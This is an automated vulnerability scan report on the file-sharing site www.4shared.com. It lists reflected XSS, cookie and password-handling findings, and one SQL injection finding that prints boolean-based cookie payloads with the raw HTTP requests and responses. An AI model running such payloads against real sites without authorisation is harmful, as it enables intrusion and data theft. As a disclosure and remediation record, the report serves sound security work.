XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, www.4shared.com

Report generated by XSS.CX at Fri Jul 29 09:13:59 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

2. Cross-site scripting (reflected)

2.1. http://www.4shared.com/css/indexm.css [REST URL parameter 1]

2.2. http://www.4shared.com/css/indexm.css [REST URL parameter 1]

2.3. http://www.4shared.com/css/indexm.css [REST URL parameter 2]

2.4. http://www.4shared.com/css/indexm.css [REST URL parameter 2]

2.5. http://www.4shared.com/css/main.css [REST URL parameter 1]

2.6. http://www.4shared.com/css/main.css [REST URL parameter 1]

2.7. http://www.4shared.com/css/main.css [REST URL parameter 2]

2.8. http://www.4shared.com/css/main.css [REST URL parameter 2]

2.9. http://www.4shared.com/css/mobile20.css [REST URL parameter 1]

2.10. http://www.4shared.com/css/mobile20.css [REST URL parameter 1]

2.11. http://www.4shared.com/css/mobile20.css [REST URL parameter 2]

2.12. http://www.4shared.com/css/mobile20.css [REST URL parameter 2]

2.13. http://www.4shared.com/css/style.css [REST URL parameter 1]

2.14. http://www.4shared.com/css/style.css [REST URL parameter 1]

2.15. http://www.4shared.com/css/style.css [REST URL parameter 2]

2.16. http://www.4shared.com/css/style.css [REST URL parameter 2]

2.17. http://www.4shared.com/desktop/ [REST URL parameter 1]

2.18. http://www.4shared.com/desktop/ [REST URL parameter 1]

2.19. http://www.4shared.com/enter.jsp [REST URL parameter 1]

2.20. http://www.4shared.com/enter.jsp [REST URL parameter 1]

2.21. http://www.4shared.com/enter.jsp [au parameter]

2.22. http://www.4shared.com/enterprise/ [REST URL parameter 1]

2.23. http://www.4shared.com/enterprise/ [REST URL parameter 1]

2.24. http://www.4shared.com/favicon.ico [REST URL parameter 1]

2.25. http://www.4shared.com/favicon.ico [REST URL parameter 1]

2.26. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 1]

2.27. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 1]

2.28. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 2]

2.29. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 2]

2.30. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 3]

2.31. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 3]

2.32. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 1]

2.33. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 1]

2.34. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 2]

2.35. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 2]

2.36. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 3]

2.37. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 3]

2.38. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 1]

2.39. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 1]

2.40. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 2]

2.41. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 2]

2.42. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 3]

2.43. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 3]

2.44. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 1]

2.45. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 1]

2.46. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 2]

2.47. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 2]

2.48. http://www.4shared.com/images/tomcat.gif [REST URL parameter 1]

2.49. http://www.4shared.com/images/tomcat.gif [REST URL parameter 1]

2.50. http://www.4shared.com/images/tomcat.gif [REST URL parameter 2]

2.51. http://www.4shared.com/images/tomcat.gif [REST URL parameter 2]

2.52. http://www.4shared.com/images/void.gif [REST URL parameter 1]

2.53. http://www.4shared.com/images/void.gif [REST URL parameter 1]

2.54. http://www.4shared.com/images/void.gif [REST URL parameter 2]

2.55. http://www.4shared.com/images/void.gif [REST URL parameter 2]

2.56. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 1]

2.57. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 1]

2.58. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 2]

2.59. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 2]

2.60. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 1]

2.61. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 1]

2.62. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 2]

2.63. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 2]

2.64. http://www.4shared.com/js/Jsonp.js [REST URL parameter 1]

2.65. http://www.4shared.com/js/Jsonp.js [REST URL parameter 1]

2.66. http://www.4shared.com/js/Jsonp.js [REST URL parameter 2]

2.67. http://www.4shared.com/js/Jsonp.js [REST URL parameter 2]

2.68. http://www.4shared.com/js/UploadModule.js [REST URL parameter 1]

2.69. http://www.4shared.com/js/UploadModule.js [REST URL parameter 1]

2.70. http://www.4shared.com/js/UploadModule.js [REST URL parameter 2]

2.71. http://www.4shared.com/js/UploadModule.js [REST URL parameter 2]

2.72. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 1]

2.73. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 1]

2.74. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 2]

2.75. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 2]

2.76. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 3]

2.77. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 3]

2.78. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 1]

2.79. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 1]

2.80. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 2]

2.81. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 2]

2.82. http://www.4shared.com/js/index.js [REST URL parameter 1]

2.83. http://www.4shared.com/js/index.js [REST URL parameter 1]

2.84. http://www.4shared.com/js/index.js [REST URL parameter 2]

2.85. http://www.4shared.com/js/index.js [REST URL parameter 2]

2.86. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1]

2.87. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1]

2.88. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2]

2.89. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2]

2.90. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1]

2.91. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1]

2.92. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2]

2.93. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2]

2.94. http://www.4shared.com/login.jsp [REST URL parameter 1]

2.95. http://www.4shared.com/login.jsp [REST URL parameter 1]

2.96. http://www.4shared.com/m/ [REST URL parameter 1]

2.97. http://www.4shared.com/m/ [REST URL parameter 1]

2.98. http://www.4shared.com/premium.jsp [REST URL parameter 1]

2.99. http://www.4shared.com/premium.jsp [REST URL parameter 1]

2.100. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1]

2.101. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1]

2.102. http://www.4shared.com/requestCall.jsp [REST URL parameter 1]

2.103. http://www.4shared.com/requestCall.jsp [REST URL parameter 1]

2.104. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 1]

2.105. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 1]

2.106. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 2]

2.107. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 2]

2.108. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 3]

2.109. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 3]

2.110. http://www.4shared.com/signup.jsp [REST URL parameter 1]

2.111. http://www.4shared.com/signup.jsp [REST URL parameter 1]

2.112. http://www.4shared.com/sync/sync.css [REST URL parameter 1]

2.113. http://www.4shared.com/sync/sync.css [REST URL parameter 1]

2.114. http://www.4shared.com/sync/sync.css [REST URL parameter 2]

2.115. http://www.4shared.com/sync/sync.css [REST URL parameter 2]

2.116. http://www.4shared.com/icons/16x16/doc.gif [Referer HTTP header]

2.117. http://www.4shared.com/icons/16x16/pdf.gif [Referer HTTP header]

2.118. http://www.4shared.com/icons/16x16/png.gif [Referer HTTP header]

2.119. http://www.4shared.com/images/asf-logo.gif [Referer HTTP header]

2.120. http://www.4shared.com/images/tomcat.gif [Referer HTTP header]

2.121. http://www.4shared.com/images/void.gif [Referer HTTP header]

2.122. http://www.4shared.com/js/'%20+%20img%20+%20' [Referer HTTP header]

2.123. http://www.4shared.com/js/'%20+%20val%20+%20' [Referer HTTP header]

3. Cleartext submission of password

3.1. http://www.4shared.com/

3.2. http://www.4shared.com/

3.3. http://www.4shared.com/enter.jsp

3.4. http://www.4shared.com/login.jsp

4. Flash cross-domain policy

5. Cookie scoped to parent domain

5.1. http://www.4shared.com/favicon.ico

5.2. http://www.4shared.com/icons/16x16/default.png

5.3. http://www.4shared.com/images/spacer.gif

5.4. http://www.4shared.com/js/Jsonp.js

5.5. http://www.4shared.com/js/homeScript.jsp

5.6. http://www.4shared.com/js/loginScript.jsp

5.7. http://www.4shared.com/js/plupload/plupload.flash.js

5.8. http://www.4shared.com/js/plupload/plupload.js

5.9. http://www.4shared.com/js/plupload/plupload.silverlight.js

5.10. http://www.4shared.com/js/signup-script.jsp

5.11. http://www.4shared.com/sla.jsp

5.12. http://www.4shared.com/enter.jsp

5.13. http://www.4shared.com/premium.jsp

5.14. http://www.4shared.com/signup.jsp

6. Cookie without HttpOnly flag set

6.1. http://www.4shared.com/favicon.ico

6.2. http://www.4shared.com/icons/16x16/default.png

6.3. http://www.4shared.com/images/asf-logo.gif

6.4. http://www.4shared.com/images/spacer.gif

6.5. http://www.4shared.com/images/tomcat.gif

6.6. http://www.4shared.com/images/void.gif

6.7. http://www.4shared.com/js/Jsonp.js

6.8. http://www.4shared.com/js/homeScript.jsp

6.9. http://www.4shared.com/js/loginScript.jsp

6.10. http://www.4shared.com/js/plupload/plupload.flash.js

6.11. http://www.4shared.com/js/plupload/plupload.js

6.12. http://www.4shared.com/js/plupload/plupload.silverlight.js

6.13. http://www.4shared.com/js/signup-script.jsp

6.14. http://www.4shared.com/sla.jsp

6.15. http://www.4shared.com/advertise/search/images/300x250.gif

6.16. http://www.4shared.com/advertise/search/images/468x60.gif

6.17. http://www.4shared.com/advertise/search/images/728x90.gif

6.18. http://www.4shared.com/css/common.css

6.19. http://www.4shared.com/css/index.css

6.20. http://www.4shared.com/css/lang/style-ms.css

6.21. http://www.4shared.com/css/lang/style-ru.css

6.22. http://www.4shared.com/css/mainWithoutCommon.css

6.23. http://www.4shared.com/css/style.css

6.24. http://www.4shared.com/desktop/images/scr3_new.gif

6.25. http://www.4shared.com/desktop/images/scr4.gif

6.26. http://www.4shared.com/desktop/images/scr5.gif

6.27. http://www.4shared.com/desktop/images/scr6.gif

6.28. http://www.4shared.com/developer/developer.css

6.29. http://www.4shared.com/developer/images/devices.png

6.30. http://www.4shared.com/developer/images/footer-corner.png

6.31. http://www.4shared.com/developer/images/title.png

6.32. http://www.4shared.com/enter.jsp

6.33. http://www.4shared.com/images/1.gif

6.34. http://www.4shared.com/images/2.gif

6.35. http://www.4shared.com/images/3.gif

6.36. http://www.4shared.com/images/4.gif

6.37. http://www.4shared.com/images/bg10.png

6.38. http://www.4shared.com/images/blueBanner_plus.gif

6.39. http://www.4shared.com/images/bookmarks/newstyle/facebook.png

6.40. http://www.4shared.com/images/bookmarks/newstyle/orkut.png

6.41. http://www.4shared.com/images/bookmarks/newstyle/orkutshare.png

6.42. http://www.4shared.com/images/bookmarks/newstyle/twitter.png

6.43. http://www.4shared.com/images/brdlefts.gif

6.44. http://www.4shared.com/images/brdrights.gif

6.45. http://www.4shared.com/images/butGetStarted.gif

6.46. http://www.4shared.com/images/butGo.gif

6.47. http://www.4shared.com/images/butJoinNow.gif

6.48. http://www.4shared.com/images/butLogin.gif

6.49. http://www.4shared.com/images/cornerBL.gif

6.50. http://www.4shared.com/images/cornerBL2.gif

6.51. http://www.4shared.com/images/cornerBR.gif

6.52. http://www.4shared.com/images/cornerBR2.gif

6.53. http://www.4shared.com/images/cornerTL.gif

6.54. http://www.4shared.com/images/cornerTL3.gif

6.55. http://www.4shared.com/images/cornerTL6.gif

6.56. http://www.4shared.com/images/cornerTR.gif

6.57. http://www.4shared.com/images/crn1.gif

6.58. http://www.4shared.com/images/crn2.gif

6.59. http://www.4shared.com/images/crn3.gif

6.60. http://www.4shared.com/images/div2.gif

6.61. http://www.4shared.com/images/divtop.gif

6.62. http://www.4shared.com/images/docImg1.jpg

6.63. http://www.4shared.com/images/docImg2.jpg

6.64. http://www.4shared.com/images/docImg4.jpg

6.65. http://www.4shared.com/images/docScr1.jpg

6.66. http://www.4shared.com/images/feat1doc.gif

6.67. http://www.4shared.com/images/feat1mus.gif

6.68. http://www.4shared.com/images/feat2doc.gif

6.69. http://www.4shared.com/images/feat3.gif

6.70. http://www.4shared.com/images/feat3doc.gif

6.71. http://www.4shared.com/images/feat4.gif

6.72. http://www.4shared.com/images/featbg1.gif

6.73. http://www.4shared.com/images/featbg2mus.gif

6.74. http://www.4shared.com/images/featimg1doc.gif

6.75. http://www.4shared.com/images/featimg1mus.gif

6.76. http://www.4shared.com/images/featimg2doc.gif

6.77. http://www.4shared.com/images/featimg3doc.gif

6.78. http://www.4shared.com/images/featimg4doc.gif

6.79. http://www.4shared.com/images/featimg4mus.gif

6.80. http://www.4shared.com/images/fileSharing.jpg

6.81. http://www.4shared.com/images/fileSharingScheme.gif

6.82. http://www.4shared.com/images/fileSharingView.gif

6.83. http://www.4shared.com/images/hborders.gif

6.84. http://www.4shared.com/images/icons/16x16/expand.png

6.85. http://www.4shared.com/images/icons/16x16/shrink.png

6.86. http://www.4shared.com/images/icons/64x64/dollars.png

6.87. http://www.4shared.com/images/icons/64x64/support.png

6.88. http://www.4shared.com/images/icons/all.png

6.89. http://www.4shared.com/images/icons/flags/ae.gif

6.90. http://www.4shared.com/images/icons/flags/ar.gif

6.91. http://www.4shared.com/images/icons/flags/au.gif

6.92. http://www.4shared.com/images/icons/flags/bg.gif

6.93. http://www.4shared.com/images/icons/flags/bh.gif

6.94. http://www.4shared.com/images/icons/flags/bo.gif

6.95. http://www.4shared.com/images/icons/flags/br.gif

6.96. http://www.4shared.com/images/icons/flags/ca.gif

6.97. http://www.4shared.com/images/icons/flags/fi.gif

6.98. http://www.4shared.com/images/icons/flags/fr.gif

6.99. http://www.4shared.com/images/icons/flags/gb.gif

6.100. http://www.4shared.com/images/icons/flags/iq.gif

6.101. http://www.4shared.com/images/icons/flags/ir.gif

6.102. http://www.4shared.com/images/icons/flags/it.gif

6.103. http://www.4shared.com/images/icons/flags/jp.gif

6.104. http://www.4shared.com/images/icons/flags/kw.gif

6.105. http://www.4shared.com/images/icons/flags/lk.gif

6.106. http://www.4shared.com/images/icons/flags/lt.gif

6.107. http://www.4shared.com/images/icons/flags/lu.gif

6.108. http://www.4shared.com/images/icons/flags/ly.gif

6.109. http://www.4shared.com/images/icons/flags/mx.gif

6.110. http://www.4shared.com/images/icons/flags/my.gif

6.111. http://www.4shared.com/images/icons/flags/nl.gif

6.112. http://www.4shared.com/images/icons/flags/no.gif

6.113. http://www.4shared.com/images/icons/misc/ok.gif

6.114. http://www.4shared.com/images/images/icossl.gif

6.115. http://www.4shared.com/images/index-premium-features.png

6.116. http://www.4shared.com/images/logo.gif

6.117. http://www.4shared.com/images/logol.gif

6.118. http://www.4shared.com/images/menu.gif

6.119. http://www.4shared.com/images/menuOver.gif

6.120. http://www.4shared.com/images/menuSel.gif

6.121. http://www.4shared.com/images/menutabs.gif

6.122. http://www.4shared.com/images/mobile/nokia_e51_thumb.png

6.123. http://www.4shared.com/images/mobile/nokia_e63_thumb.png

6.124. http://www.4shared.com/images/mobile/nokia_e66_thumb.png

6.125. http://www.4shared.com/images/mobile/nokia_e71_thumb.png

6.126. http://www.4shared.com/images/mobile/nokia_e72_thumb.png

6.127. http://www.4shared.com/images/mobile/screens/4mS_1.jpg

6.128. http://www.4shared.com/images/mobile/screens/4mS_2.jpg

6.129. http://www.4shared.com/images/mobile/screens/4mS_3.jpg

6.130. http://www.4shared.com/images/mobile/screens/4mS_4.jpg

6.131. http://www.4shared.com/images/mobile/square_4shared.png

6.132. http://www.4shared.com/images/mobile/symbian_mobile_new.png

6.133. http://www.4shared.com/images/musImg2.jpg

6.134. http://www.4shared.com/images/musImg3.jpg

6.135. http://www.4shared.com/images/musImg4.jpg

6.136. http://www.4shared.com/images/musScr2.gif

6.137. http://www.4shared.com/images/play.gif

6.138. http://www.4shared.com/images/resellerHead.png

6.139. http://www.4shared.com/images/shad1.gif

6.140. http://www.4shared.com/images/shad2.gif

6.141. http://www.4shared.com/images/shad3.gif

6.142. http://www.4shared.com/images/shad4.gif

6.143. http://www.4shared.com/images/top.jpg

6.144. http://www.4shared.com/images/topbg.gif

6.145. http://www.4shared.com/images/vborders.gif

6.146. http://www.4shared.com/js/Events.js

6.147. http://www.4shared.com/js/homeScript.jsp

6.148. http://www.4shared.com/js/jquery-1.4.4.min.js

6.149. http://www.4shared.com/js/loginScript.jsp

6.150. http://www.4shared.com/js/signup-script.jsp

6.151. http://www.4shared.com/js/sysinfo.js

6.152. http://www.4shared.com/login.jsp

6.153. http://www.4shared.com/premium.jsp

6.154. http://www.4shared.com/signup.jsp

7. Password field with autocomplete enabled

7.1. http://www.4shared.com/

7.2. http://www.4shared.com/

7.3. http://www.4shared.com/enter.jsp

7.4. http://www.4shared.com/enter.jsp

7.5. http://www.4shared.com/login.jsp

7.6. http://www.4shared.com/signup.jsp

8. Source code disclosure

9. Cross-domain POST

9.1. http://www.4shared.com/premium.jsp

9.2. http://www.4shared.com/premium.jsp

9.3. http://www.4shared.com/premium.jsp

9.4. http://www.4shared.com/premium.jsp

9.5. http://www.4shared.com/premium.jsp

9.6. http://www.4shared.com/premium.jsp

9.7. http://www.4shared.com/premium.jsp

9.8. http://www.4shared.com/premium.jsp

9.9. http://www.4shared.com/premium.jsp

10. Cross-domain Referer leakage

10.1. http://www.4shared.com/enter.jsp

10.2. http://www.4shared.com/premium.jsp

11. Cross-domain script include

11.1. http://www.4shared.com/

11.2. http://www.4shared.com/desktop/

11.3. http://www.4shared.com/enter.jsp

11.4. http://www.4shared.com/enterprise/

11.5. http://www.4shared.com/icons/16x16/doc.gif

11.6. http://www.4shared.com/icons/16x16/pdf.gif

11.7. http://www.4shared.com/icons/16x16/png.gif

11.8. http://www.4shared.com/images/asf-logo.gif

11.9. http://www.4shared.com/images/tomcat.gif

11.10. http://www.4shared.com/images/void.gif

11.11. http://www.4shared.com/js/'%20+%20img%20+%20'

11.12. http://www.4shared.com/js/'%20+%20val%20+%20'

11.13. http://www.4shared.com/login.jsp

11.14. http://www.4shared.com/m/

11.15. http://www.4shared.com/m/iphone.jsp

11.16. http://www.4shared.com/premium.jsp

11.17. http://www.4shared.com/remindPassword.jsp

11.18. http://www.4shared.com/requestCall.jsp

11.19. http://www.4shared.com/signup.jsp

11.20. http://www.4shared.com/sla.jsp

12. File upload functionality

12.1. http://www.4shared.com/

12.2. http://www.4shared.com/icons/16x16/doc.gif

12.3. http://www.4shared.com/icons/16x16/pdf.gif

12.4. http://www.4shared.com/icons/16x16/png.gif

12.5. http://www.4shared.com/images/asf-logo.gif

12.6. http://www.4shared.com/images/tomcat.gif

12.7. http://www.4shared.com/images/void.gif

12.8. http://www.4shared.com/js/'%20+%20img%20+%20'

12.9. http://www.4shared.com/js/'%20+%20val%20+%20'

13. Email addresses disclosed

13.1. http://www.4shared.com/desktop/

13.2. http://www.4shared.com/enterprise/

13.3. http://www.4shared.com/premium.jsp

13.4. http://www.4shared.com/sla.jsp

14. Credit card numbers disclosed

14.1. http://www.4shared.com/images/asf-logo.gif

14.2. http://www.4shared.com/images/tomcat.gif

15. Content type incorrectly stated

15.1. http://www.4shared.com/js/UploadModule.js

15.2. http://www.4shared.com/js/homeScript.jsp

16. Content type is not specified



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.4shared.com
Path:   /icons/16x16/pdf.gif

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /icons/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320'%20and%201%3d1--%20; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 404 /icons/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:46 GMT
Content-Length: 38706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<iframe id='a729069d' name='a729069d' src='http://openx.4shared.com/www/delivery/afr.php?zoneid=4&amp;target=_blank&amp;cb=0.8403259016862198&amp;ct0=INSERT_CLICKURL_HERE' framespacing='0' frameborder='no' scrolling='no' width='728' height='90'><a href='http://openx.4shared.com/www/delivery/ck.php?n=aa117342&amp;cb=0.5225984301068964' target='_blank'><img src='http://openx.4shared.com/www/delivery/avw.php?zoneid=4&amp;cb=0.18010964918736116&amp;n=aa117342&amp;ct0=INSERT_CLICKURL_HERE' border='0' alt='' /></a></iframe>







</center>
<br /><br />


<div style="border-bottom:dotted 1px #9E9E9E"></div>
<br />
<table cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td>

<table cellpadding="0" cellspacing="0" width="100%">
<tr><td class="boxtl"></td><td class="boxt"></td><td class="boxtr"></td></tr>
<tr>
<td class="boxl"></td>
<td class="boxc" style="padding:5px">

<img alt="" src="/images/spacer.gif" class="warn" hspace="3" align="left" />


The file link that you requested is not valid.

</td>
<td class="boxr"></td>
</tr>
<tr><td class="boxbl"></td><td class="boxb"></td><td class="boxbr"></td></tr>
</table>
<br />
<center>


















<a href="http://dc407.4shared.com/download/i6VQkuc5"
onclick="return rotatorRegisterClick(3, true);"><img src="http://static.4shared.com/images/butSync2.gif"
alt="Download 4shared Sync"
title="Download 4shared Sync" width="139"
height="52"/></a>







</center>


<br />


<div style="border-bottom:dotted 1px #9E9E9E">
<br />







































</div>

<br />

<div class="small" >
Want to have
...[SNIP]...

Request 2

GET /icons/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320'%20and%201%3d2--%20; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 404 /icons/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:46 GMT
Content-Length: 38525


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<iframe id='a729069d' name='a729069d' src='http://openx.4shared.com/www/delivery/afr.php?zoneid=4&amp;target=_blank&amp;cb=0.6554702248030106&amp;ct0=INSERT_CLICKURL_HERE' framespacing='0' frameborder='no' scrolling='no' width='728' height='90'><a href='http://openx.4shared.com/www/delivery/ck.php?n=aa117342&amp;cb=0.41127708511303995' target='_blank'><img src='http://openx.4shared.com/www/delivery/avw.php?zoneid=4&amp;cb=0.7838254378470499&amp;n=aa117342&amp;ct0=INSERT_CLICKURL_HERE' border='0' alt='' /></a></iframe>







</center>
<br /><br />


<div style="border-bottom:dotted 1px #9E9E9E"></div>
<br />
<table cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td>

<table cellpadding="0" cellspacing="0" width="100%">
<tr><td class="boxtl"></td><td class="boxt"></td><td class="boxtr"></td></tr>
<tr>
<td class="boxl"></td>
<td class="boxc" style="padding:5px">

<img alt="" src="/images/spacer.gif" class="warn" hspace="3" align="left" />


The file link that you requested is not valid.

</td>
<td class="boxr"></td>
</tr>
<tr><td class="boxbl"></td><td class="boxb"></td><td class="boxbr"></td></tr>
</table>
<br />
<center>






















<a href="http://dc153.4shared.com/download/aK3Km2yI/4shared_Desktop_332.exe" onclick="return rotatorRegisterClick(1, true);"><img
src="http://static.4shared.com/images/butDesktop2.gif" alt="Download 4shared Desktop" title="Download 4shared Desktop"
width="139" height="52"/></a>



</center>


<br />


<div style="border-bottom:dotted 1px #9E9E9E">
<br />







































</div>

<br />

<div class="small" >
Want to have your own account to share files?&nbsp;
<b class="red"><a href="http://www.4shared.com/signup.jsp" onclick="return loadAndShowSignUpBox(event, '');">Sign Up</a></b>

...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 123 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

